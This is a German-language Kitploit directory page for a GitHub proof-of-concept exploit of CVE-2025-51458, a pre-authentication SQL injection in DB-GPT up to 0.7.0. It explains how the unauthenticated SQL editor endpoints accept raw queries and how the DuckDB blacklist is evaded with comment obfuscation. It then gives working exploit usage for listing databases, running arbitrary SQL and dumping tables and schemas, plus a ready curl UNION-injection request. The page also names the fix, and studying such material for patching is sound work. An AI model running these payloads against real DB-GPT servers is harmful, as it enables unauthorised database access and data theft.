Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Tools/GitHubGitHub/q1uf3ng/cve-2025-51458-exp
SchwachstellenanalyseCode-AnalyseExploitationWebanwendungs-ExploitationPenetrationstestsDatenbanksicherheit
GitHubq1uf3ng/cve-2025-51458-exp

CVE-2025-51458-exp

CVE-2025-51458 - DB-GPT Pre-Auth SQL Injection PoC

Repository anzeigen
11vor 4 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-51458-exp

Pre-Auth SQL Injection in DB-GPT <= 0.7.0

Übersicht

Die Endpunkte /api/v1/editor/sql/run und /api/v1/editor/chart/run akzeptieren beliebige SQL-Abfragen ohne Authentifizierung. Die sanitize_sql-Blacklist deckt nur DuckDB ab; MySQL-, PostgreSQL- und SQLite-Verbindungen erhalten rohe Benutzereingaben ohne Filterung. Die DuckDB-Blacklist selbst kann über Kommentar-Verschleierung (SEL/**/ECT) umgangen werden.

Dies ist ein Bypass von CVE-2024-10835 und CVE-2024-10901.

  • CVSS: 6,5 (Mittel)
  • Typ: CWE-89 (SQL-Injection)
  • Auth: Keine erforderlich (Pre-Auth)
  • Betroffen: DB-GPT <= 0.7.0
  • Behoben: PR #2650

Verwendung

root@kitploit:~
# Datenbanken auflisten
python3 exp.py http://target:5670 --list-dbs

# SQL ausführen
python3 exp.py http://target:5670 <db_name> --sql "SELECT VERSION()"

# Tabellen ausgeben
python3 exp.py http://target:5670 <db_name> --dump-tables

# Schema ausgeben
python3 exp.py http://target:5670 <db_name> --dump-db

# DuckDB-Bypass
python3 exp.py http://target:5670 <db_name> --duckdb-bypass --sql "SELECT CURRENT_SETTING('access_mode')"

# Interaktiver Modus
python3 exp.py http://target:5670 <db_name>
Tool herunterladen

Schneller PoC

root@kitploit:~
curl -X POST "http://target:5670/api/v1/editor/sql/run" \
  -H "Content-Type: application/json" \
  -d '{"db_name":"test_db","sql":"SELECT 1 UNION ALL SELECT table_name FROM information_schema.tables--"}'

Referenzen

  • NVD
  • Gecko Security Blog
  • Fix PR #2650